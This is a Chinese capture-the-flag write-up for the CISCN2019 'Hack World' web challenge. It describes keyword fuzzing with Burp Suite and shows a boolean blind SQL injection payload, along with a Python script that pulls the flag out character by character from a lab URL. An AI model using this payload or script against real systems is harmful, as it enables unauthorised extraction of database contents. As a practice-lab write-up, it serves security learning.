7.[CISCN2019 华北赛区 Day2 Web1]Hack World
进入题目页面如下
有注入点,尝试SQL注入
判断是整数型注入还是字符型注入
尝试了一些恶意SQL语句但都无果,看来严格过滤了很多关键字
用burp suite爆破,看看过滤了哪些关键字
导入Fuzz字典开始测试
看到过滤了很多
这里便没有思路了,看来大佬的wp跟着做下去,链接附上
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解-CSDN博客
大佬说
(ascii(substr((select(flag)from(flag)),1,1))>32) 若成立,则会返回1,id=1时会回显出一段字符,根据是否回显,通过这个可以将flag中的字符一个一个拆解出来
用python编写盲注脚本
大佬写的脚本
import time
import requests
url = "http://27438b35-6ed7-412e-92bf-fa0ced32ecde.node5.buuoj.cn:81/index.php"
result = ""
for i in range(1, 50):
for j in range(32, 128):
# time.sleep(0.1)
payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"
response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})
if response.text.find('girl') == -1:
result += chr(j)
print(j)
break
print("正在注出flag:", result)
print("flag的值为:", result)跑个脚本最终得到flag
